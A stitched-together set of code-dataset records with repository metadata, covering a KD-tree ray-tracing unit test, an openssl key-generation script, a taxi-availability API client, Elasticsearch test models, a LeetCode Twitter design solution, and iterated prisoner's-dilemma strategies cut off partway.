node21 = kdtree.KDNode(tris[1])
node22 = kdtree.KDNode(tris[2])
node23 = kdtree.KDNode(tris[3])
node10 = kdtree.KDNode()
node10.bounding_box = shapes.AxisAlignedBoundingBox([-5, 0, 0], [-1.5, 1, 0])
node10.left = node20
node10.right = node21
node11 = kdtree.KDNode()
node11.bounding_box = shapes.AxisAlignedBoundingBox([0., 0, 0], [3.5, 1, 0])
node11.left = node22
node11.right = node23
node00 = kdtree.KDNode()
node00.bounding_box = self.triangles.bounding_box
node00.left = node10
node00.right = node11
node00.order = 0
self.assertEqual(node00, tree.root)
def test_trace(self):
with self.subTest(stacked=False):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, 0.5, 3],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 1, 1]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.left.right, tree.root.right.left, tree.root.right.right]
with self.subTest(rotation=None, translation=None):
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertFalse(int_check["check"])
self.assertTrue(np.isnan(int_check["intersect"]).all())
self.assertTrue(np.isnan(int_check["normal"]).all())
self.assertTrue(np.isnan(int_check["albedo"]))
self.assertEqual(int_check["facet"], -1)
rotation = at.Rotation([0, 0, -np.pi / 2])
rays_test.ignore = None
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [0, 0, -0.5]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1.5])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(rotation=rotation, translation=translation):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1.5])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
rotation = at.Rotation([np.pi / 2, 0, 0])
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [2.5, 0, 0]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"][0])
for ind, int_check in enumerate(ints[1:]):
ind += 1
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind-1])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind-1].id*(10**(tc.root.order+1)))
translation = [0, -0.5, 0]
with self.subTest(rotation=rotation, translation=translation):
with self.subTest(order='rt'):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1.5, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(order='tr'):
tc = copy.deepcopy(tree)
tc.translate(translation)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0, 0, 0, 0]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(stacked=True):
tree = kdtree.KDTree(self.stacked_tries, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, -4.5, -2],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 5, 5]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.right.left, tree.root.left.right, tree.root.right.right]
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[0].id*(10**(tree.root.order+1)))
class TestKDNode(TestCase):
def setUp(self):
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1, np.arange(12).reshape(-1, 3))
def test_creation(self):
node = kdtree.KDNode(surface=self.triangles)
self.assertEqual(node.surface, self.triangles)
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
self.assertIsNone(node.left)
self.assertIsNone(node.right)
def test_compute_bounding_box(self):
node = kdtree.KDNode()
node.surface = self.triangles
node.has_surface = True
node.compute_bounding_box()
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
def test_split(self):
node = kdtree.KDNode(surface=self.triangles)
node.split(force=True, print_progress=False)
left_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6).reshape(3, -1), compute_bounding_box=False))
right_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6, 12).reshape(3, -1), compute_bounding_box=False))
self.assertEqual(node.left, left_tris)
self.assertEqual(node.right, right_tris)
def test_trace(self):
pass
| true
| true
|
f7051dc56c585ff1a625d6db41e7759458136b36
| 446
|
py
|
Python
|
scripts/debian/usr/lib/dipicar/scripts/installation/ssl_keys_gen.py
|
TeaFlex/DiPiCar
|
e56f74ac55f5cfff22fd82807b06dc367c42cac0
|
[
"0BSD"
] | 1
|
2021-07-10T13:41:00.000Z
|
2021-07-10T13:41:00.000Z
|
scripts/debian/usr/lib/dipicar/scripts/installation/ssl_keys_gen.py
|
TeaFlex/DiPiCar
|
e56f74ac55f5cfff22fd82807b06dc367c42cac0
|
[
"0BSD"
] | null | null | null |
scripts/debian/usr/lib/dipicar/scripts/installation/ssl_keys_gen.py
|
TeaFlex/DiPiCar
|
e56f74ac55f5cfff22fd82807b06dc367c42cac0
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/python3
from subprocess import call;
from sys import argv
from os import path
outPath = argv[1] if(len(argv)>1) else "/etc/dipicar/creds"
duration = 365
rsaLength = 4096
#Generate ssl keys
call([
"openssl",
"req",
"-x509",
"-newkey",
"rsa:"+str(rsaLength),
"-keyout", path.join(outPath,"key.pem"),
"-out", path.join(outPath,"cert.pem"),
"-days", str(duration),
"--batch",
"-nodes"
])
| 19.391304
| 59
| 0.596413
|
from subprocess import call;
from sys import argv
from os import path
outPath = argv[1] if(len(argv)>1) else "/etc/dipicar/creds"
duration = 365
rsaLength = 4096
call([
"openssl",
"req",
"-x509",
"-newkey",
"rsa:"+str(rsaLength),
"-keyout", path.join(outPath,"key.pem"),
"-out", path.join(outPath,"cert.pem"),
"-days", str(duration),
"--batch",
"-nodes"
])
| true
| true
|
f705210f06709ba3f43e67e92c0421ff78f57d45
| 649
|
py
|
Python
|
chalicelib/api/taxiAvailability.py
|
yeukfei02/singapore-taxi-api
|
25749c3a8c07849d4a2a13410da712ca64d102ca
|
[
"MIT"
] | null | null | null |
chalicelib/api/taxiAvailability.py
|
yeukfei02/singapore-taxi-api
|
25749c3a8c07849d4a2a13410da712ca64d102ca
|
[
"MIT"
] | 1
|
2021-05-04T03:30:01.000Z
|
2021-05-05T13:38:41.000Z
|
chalicelib/api/taxiAvailability.py
|
yeukfei02/singapore-taxi-api
|
25749c3a8c07849d4a2a13410da712ca64d102ca
|
[
"MIT"
] | null | null | null |
import requests
import os
ROOT_URL = 'http://datamall2.mytransport.sg/ltaodataservice'
def get_taxi_availability_request():
result = None
try:
url = '{}/Taxi-Availability'.format(ROOT_URL)
headers = {
'AccountKey': os.getenv('ACCOUNT_KEY'),
'Accept': 'application/json'
}
response = requests.get(url, headers=headers)
print('response status = ', response.status_code)
print('response json = ', response.json())
if response.status_code == 200:
result = response.json()
except Exception as e:
print('error = ', e)
return result
| 24.037037
| 60
| 0.604006
|
import requests
import os
ROOT_URL = 'http://datamall2.mytransport.sg/ltaodataservice'
def get_taxi_availability_request():
result = None
try:
url = '{}/Taxi-Availability'.format(ROOT_URL)
headers = {
'AccountKey': os.getenv('ACCOUNT_KEY'),
'Accept': 'application/json'
}
response = requests.get(url, headers=headers)
print('response status = ', response.status_code)
print('response json = ', response.json())
if response.status_code == 200:
result = response.json()
except Exception as e:
print('error = ', e)
return result
| true
| true
|
f7052138819216e6f5c48540636b581bd627c13e
| 1,164
|
py
|
Python
|
ocdb/ws/handlers/__init__.py
|
eocdb/ocdb-server
|
0e28d092e8ecf5f4813878aab43de990cc5fb4ee
|
[
"MIT"
] | null | null | null |
ocdb/ws/handlers/__init__.py
|
eocdb/ocdb-server
|
0e28d092e8ecf5f4813878aab43de990cc5fb4ee
|
[
"MIT"
] | 1
|
2019-06-21T09:43:01.000Z
|
2019-06-21T09:43:01.000Z
|
eocdb/ws/handlers/__init__.py
|
bcdev/ocdb-server
|
027078f2b022a06b3a417d76d273514a72f8cac7
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
# Copyright (c) 2018 by EUMETSAT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from ._mappings import MAPPINGS, API_URL_PREFIX
| 48.5
| 81
| 0.77921
|
from ._mappings import MAPPINGS, API_URL_PREFIX
| true
| true
|
f705217d4ccc8cc742ed3dae28f533f8474e2433
| 1,752
|
py
|
Python
|
tests/adapters/model/elasticsearch_model/elements.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/adapters/model/elasticsearch_model/elements.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/adapters/model/elasticsearch_model/elements.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
import re
from collections import defaultdict
from datetime import datetime
from elasticsearch_dsl import Keyword, Text
from protean import BaseAggregate, BaseValueObject
from protean.core.model import BaseModel
from protean.fields import DateTime, Integer, String
from protean.fields import Text as ProteanText
from protean.fields import ValueObject
class Person(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
created_at = DateTime(default=datetime.now())
class Alien(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class User(BaseAggregate):
email = String(max_length=255, required=True, unique=True)
password = String(max_length=3026)
class Email(BaseValueObject):
REGEXP = r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?"
# This is the external facing data attribute
address = String(max_length=254, required=True)
def clean(self):
"""Business rules of Email address"""
errors = defaultdict(list)
if not bool(re.match(Email.REGEXP, self.address)):
errors["address"].append("is invalid")
return errors
class ComplexUser(BaseAggregate):
email = ValueObject(Email, required=True)
password = String(required=True, max_length=255)
class Provider(BaseAggregate):
name = ProteanText()
about = ProteanText()
class ProviderCustomModel(BaseModel):
id = Keyword()
name = Text(fields={"raw": Keyword()})
about = Text()
class Meta:
schema = "providers"
class Receiver(BaseAggregate):
name = String()
age = Integer()
| 24.676056
| 62
| 0.703196
|
import re
from collections import defaultdict
from datetime import datetime
from elasticsearch_dsl import Keyword, Text
from protean import BaseAggregate, BaseValueObject
from protean.core.model import BaseModel
from protean.fields import DateTime, Integer, String
from protean.fields import Text as ProteanText
from protean.fields import ValueObject
class Person(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
created_at = DateTime(default=datetime.now())
class Alien(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class User(BaseAggregate):
email = String(max_length=255, required=True, unique=True)
password = String(max_length=3026)
class Email(BaseValueObject):
REGEXP = r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?"
address = String(max_length=254, required=True)
def clean(self):
errors = defaultdict(list)
if not bool(re.match(Email.REGEXP, self.address)):
errors["address"].append("is invalid")
return errors
class ComplexUser(BaseAggregate):
email = ValueObject(Email, required=True)
password = String(required=True, max_length=255)
class Provider(BaseAggregate):
name = ProteanText()
about = ProteanText()
class ProviderCustomModel(BaseModel):
id = Keyword()
name = Text(fields={"raw": Keyword()})
about = Text()
class Meta:
schema = "providers"
class Receiver(BaseAggregate):
name = String()
age = Integer()
| true
| true
|
f70521986d834f98db5a48207bb5f18312adac09
| 3,207
|
py
|
Python
|
355.Design-Twitter.py
|
mickey0524/leetcode
|
6bedeb6ff29b02a97178cca464c5fd639951801f
|
[
"MIT"
] | 18
|
2018-07-14T12:45:37.000Z
|
2022-03-26T14:51:04.000Z
|
355.Design-Twitter.py
|
mickey0524/leetcode
|
6bedeb6ff29b02a97178cca464c5fd639951801f
|
[
"MIT"
] | null | null | null |
355.Design-Twitter.py
|
mickey0524/leetcode
|
6bedeb6ff29b02a97178cca464c5fd639951801f
|
[
"MIT"
] | 3
|
2019-05-29T04:09:22.000Z
|
2021-06-07T23:37:46.000Z
|
# https://leetcode.com/problems/design-twitter/
#
# algorithms
# Medium (27.98%)
# Total Accepted: 37,655
# Total Submissions: 134,594
from collections import defaultdict
from bisect import insort
class Twitter(object):
    """In-memory Twitter clone (LeetCode 355).

    Maintains, per user, both an authored-tweet log and a pre-merged,
    stamp-sorted news feed so getNewsFeed is a simple tail slice.
    """

    def __init__(self):
        """Initialize the follow graph, per-user feeds and the global clock."""
        self.follow_map = defaultdict(set)    # follower -> followees
        self.followed_map = defaultdict(set)  # followee -> followers
        self.tweet_map = defaultdict(list)    # user -> sorted (stamp, tweetId) feed
        self.post_map = defaultdict(list)     # user -> authored (stamp, tweetId)
        self.tweet_stamp = 0                  # monotonically increasing clock

    def postTweet(self, userId, tweetId):
        """Record a tweet and fan it out to the author's followers' feeds.

        :type userId: int
        :type tweetId: int
        :rtype: None
        """
        entry = (self.tweet_stamp, tweetId)
        self.post_map[userId].append(entry)
        # The author never follows themselves (guarded in follow()), so the
        # union below inserts into each feed exactly once.
        for reader in self.followed_map[userId] | {userId}:
            insort(self.tweet_map[reader], entry)
        self.tweet_stamp += 1

    def getNewsFeed(self, userId):
        """Return up to the 10 most recent tweet ids visible to userId,
        newest first.

        :type userId: int
        :rtype: List[int]
        """
        feed = self.tweet_map[userId]
        recent = feed[-10:] if len(feed) > 10 else feed
        return [tweet_id for _, tweet_id in reversed(recent)]

    def follow(self, followerId, followeeId):
        """Follower follows a followee; invalid requests are a no-op.

        :type followerId: int
        :type followeeId: int
        :rtype: None
        """
        if followerId == followeeId or followeeId in self.follow_map[followerId]:
            return
        self.follow_map[followerId].add(followeeId)
        self.followed_map[followeeId].add(followerId)
        # Back-fill the follower's feed with everything already posted.
        for entry in self.post_map[followeeId]:
            insort(self.tweet_map[followerId], entry)

    def unfollow(self, followerId, followeeId):
        """Follower unfollows a followee; invalid requests are a no-op.

        :type followerId: int
        :type followeeId: int
        :rtype: None
        """
        if followerId == followeeId or followeeId not in self.follow_map[followerId]:
            return
        self.follow_map[followerId].discard(followeeId)
        self.followed_map[followeeId].discard(followerId)
        # Strip the followee's tweets out of the follower's merged feed.
        # Stamps are globally unique, so matching on stamp is sufficient.
        followee_stamps = {stamp for stamp, _ in self.post_map[followeeId]}
        self.tweet_map[followerId] = [
            entry for entry in self.tweet_map[followerId]
            if entry[0] not in followee_stamps
        ]
# Your Twitter object will be instantiated and called as such:
# obj = Twitter()
# obj.postTweet(userId,tweetId)
# param_2 = obj.getNewsFeed(userId)
# obj.follow(followerId,followeeId)
# obj.unfollow(followerId,followeeId)
| 29.971963
| 224
| 0.617711
|
from collections import defaultdict
from bisect import insort
class Twitter(object):
def __init__(self):
self.follow_map = defaultdict(set)
self.followed_map = defaultdict(set)
self.tweet_map = defaultdict(list)
self.post_map = defaultdict(list)
self.tweet_stamp = 0
def postTweet(self, userId, tweetId):
self.post_map[userId].append((self.tweet_stamp, tweetId))
for id in self.followed_map[userId]:
insort(self.tweet_map[id], (self.tweet_stamp, tweetId))
insort(self.tweet_map[userId], (self.tweet_stamp, tweetId))
self.tweet_stamp += 1
def getNewsFeed(self, userId):
length = len(self.tweet_map[userId])
if length <= 10:
arr = self.tweet_map[userId]
else:
arr = self.tweet_map[userId][length - 10:]
return [item[-1] for item in reversed(arr)]
def follow(self, followerId, followeeId):
if followerId == followeeId:
return
if followeeId in self.follow_map[followerId]:
return
self.follow_map[followerId].add(followeeId)
self.followed_map[followeeId].add(followerId)
for stamp, tweetId in self.post_map[followeeId]:
insort(self.tweet_map[followerId], (stamp, tweetId))
def unfollow(self, followerId, followeeId):
if followerId == followeeId:
return
if followeeId not in self.follow_map[followerId]:
return
self.follow_map[followerId].remove(followeeId)
self.followed_map[followeeId].remove(followerId)
tweet_map = set()
for stamp, _ in self.post_map[followeeId]:
tweet_map.add(stamp)
tmp = []
for stamp, tweetId in self.tweet_map[followerId]:
if stamp not in tweet_map:
tmp.append((stamp, tweetId))
self.tweet_map[followerId] = tmp
| true
| true
|
f705220d566871e203d73d64093d17551fc09aa8
| 4,506
|
py
|
Python
|
tactics.py
|
knuekim98/titfortat-simulator
|
96e1c92058d43b6e4641ea323772a7fdd22a4ccd
|
[
"MIT"
] | null | null | null |
tactics.py
|
knuekim98/titfortat-simulator
|
96e1c92058d43b6e4641ea323772a7fdd22a4ccd
|
[
"MIT"
] | null | null | null |
tactics.py
|
knuekim98/titfortat-simulator
|
96e1c92058d43b6e4641ea323772a7fdd22a4ccd
|
[
"MIT"
] | null | null | null |
from const import result
import random
C, D = True, False
def opponent(r):
    """Map this player's round result to the opponent's move (True = coop).

    NOTE(review): exact semantics depend on const.result — this assumes
    COOP and DEFECT are the two outcomes in which the opponent cooperated;
    confirm against the const module.
    """
    if r == result.COOP or r == result.DEFECT:
        return True
    return False
# tit for tat
class Tft:
    """Tit-for-tat: cooperate first, then copy the opponent's previous move."""

    def __init__(self) -> None:
        self.score = 0
        self.last_reaction = C

    def run(self):
        # Echo whatever the opponent did last round.
        return self.last_reaction

    def next(self, r):
        self.score += r.value
        self.last_reaction = opponent(r)

    def end(self):
        total = self.score
        self.last_reaction = C  # reset for the next match
        return total
# tit for two tat
class Tftt:
    """Tit-for-two-tats: defect only after two consecutive opponent defections."""

    def __init__(self) -> None:
        self.score = 0
        self.last_reaction = C
        self.last_last_reaction = C

    def run(self):
        # Cooperate unless both remembered moves were defections.  C/D are
        # booleans, so bitwise OR behaves as logical OR here.
        return self.last_reaction | self.last_last_reaction

    def next(self, r):
        self.score += r.value
        # Shift the two-move memory window in one step.
        self.last_reaction, self.last_last_reaction = (
            opponent(r),
            self.last_reaction,
        )

    def end(self):
        self.last_reaction = self.last_last_reaction = C
        return self.score
# always coop
class AlwaysCoop:
    """Unconditional cooperator: plays C every round."""

    def __init__(self) -> None:
        self.score = 0

    def run(self):
        return C

    def next(self, r):
        self.score += r.value

    def end(self):
        return self.score
# always defect
class AlwaysDefect:
    """Unconditional defector: plays D every round."""

    def __init__(self) -> None:
        self.score = 0

    def run(self):
        return D

    def next(self, r):
        self.score += r.value

    def end(self):
        return self.score
# perfect random(50%)
class Random:
    """Plays cooperate/defect uniformly at random (50% each)."""

    def __init__(self) -> None:
        self.score = 0

    def run(self):
        return random.choice([C, D])

    def next(self, r):
        self.score += r.value

    def end(self):
        return self.score
# first defect, opponent coop rate - coop(>50%) / defect(<=50%)
class Downing:
    """Defect on move one, then cooperate only while the opponent's observed
    cooperation rate is strictly above 50%."""

    def __init__(self) -> None:
        self.score = 0
        self.game_count = 0
        self.coop_count = 0

    def run(self):
        # No history yet: open with a defection.
        if self.game_count == 0:
            return D
        return C if self.coop_count / self.game_count > 0.5 else D

    def next(self, r):
        self.score += r.value
        self.game_count += 1
        self.coop_count += 1 if opponent(r) else 0

    def end(self):
        # Reset the observation counters for the next match; score is kept.
        self.game_count = self.coop_count = 0
        return self.score
# first coop, opponent coop rate - coop(>=50%) / defect(<50%)
class Downing2:
    """Like Downing but optimistic: opens with cooperation and keeps
    cooperating while the opponent's cooperation rate is at least 50%."""

    def __init__(self) -> None:
        self.score = 0
        self.game_count = 0
        self.coop_count = 0

    def run(self):
        # No history yet: open with cooperation.
        if self.game_count == 0:
            return C
        return C if self.coop_count / self.game_count >= 0.5 else D

    def next(self, r):
        self.score += r.value
        self.game_count += 1
        self.coop_count += 1 if opponent(r) else 0

    def end(self):
        # Reset the observation counters for the next match; score is kept.
        self.game_count = self.coop_count = 0
        return self.score
# coop, always defect once defected
class Grudger:
    """Cooperates until the opponent defects once, then defects forever."""

    def __init__(self) -> None:
        self.score = 0
        self.defected = False

    def run(self):
        return D if self.defected else C

    def next(self, r):
        self.score += r.value
        if not opponent(r):
            # A single defection flips the grudge permanently.
            self.defected = True

    def end(self):
        return self.score
# tft but defect by 10% rate
class Joss:
    """Tit-for-tat that sneaks in a defection roughly 10% of the time."""

    def __init__(self) -> None:
        self.score = 0
        self.last_reaction = C

    def run(self):
        # One time in ten, defect regardless of history.
        return D if random.randint(1, 10) == 1 else self.last_reaction

    def next(self, r):
        self.score += r.value
        self.last_reaction = opponent(r)

    def end(self):
        self.last_reaction = C
        return self.score
# wip
class Tester:
    """Probing strategy: defects on the first move to test retaliation.

    If the opponent punishes the opening defection, switch to mirroring
    (tit-for-tat); otherwise cooperate for two rounds and then alternate.
    """

    def __init__(self) -> None:
        self.score = 0
        self.decision = True    # next planned move once past the probe
        self.test_tft = False   # True once the opponent retaliated
        self.game_count = 0

    def run(self):
        # Open with a defection to probe the opponent.
        if self.game_count == 0:
            return D
        return self.decision

    def next(self, r):
        self.score += r.value
        # BUG FIX: the original wrote `self.game_count == 1 & (not opponent(r))`,
        # which parses as `self.game_count == (1 & bool)` because `&` binds
        # tighter than `==` — the intended conjunction never ran as written.
        if self.game_count == 1 and not opponent(r):
            self.test_tft = True
        elif self.test_tft:
            # Opponent retaliated: mirror them from now on.
            self.decision = opponent(r)
        elif self.game_count <= 2:
            self.decision = True
        else:
            # No retaliation detected: alternate moves.
            self.decision = not self.decision
        self.game_count += 1

    def end(self):
        self.decision = True
        self.test_tft = False
        self.game_count = 0
        return self.score
| 20.669725
| 63
| 0.545717
|
from const import result
import random
C, D = True, False
def opponent(r):
if r == result.COOP or r == result.DEFECT:
return True
return False
class Tft:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
class Tftt:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
self.last_last_reaction = C
def run(self):
return self.last_reaction | self.last_last_reaction
def next(self, r):
self.score += r.value
self.last_last_reaction = self.last_reaction
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
self.last_last_reaction = C
return self.score
class AlwaysCoop:
def __init__(self) -> None:
self.score = 0
def run(self):
return C
def next(self, r):
